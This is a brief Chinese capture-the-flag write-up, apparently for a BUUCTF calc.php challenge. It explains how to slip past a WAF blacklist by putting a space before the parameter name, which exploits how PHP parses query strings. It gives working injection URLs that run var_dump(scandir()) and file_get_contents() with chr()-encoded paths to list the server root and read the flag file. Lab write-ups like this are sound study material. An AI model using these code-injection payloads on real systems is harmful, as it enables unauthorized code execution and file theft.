查看源代码
发现有waf存在,以及一个url网址 ,访问一下calc.php
传入参数num,然后绕过过滤。不能出现' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'
php在解析查询字符串时会
1.删除空白符
2.将某些字符转换为下划线(包括空格)
利用这两个php函数
scandir():列出参数目录中的文件和目录
readfile():读取文件内容
传参的num里出现黑名单里面的就会报错
这里用空格隔开后,就是空格加num不在num的判断黑名单中。
http://node4.buuoj.cn:28320/calc.php?%20num=1;var_dump(scandir(chr(47)))
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))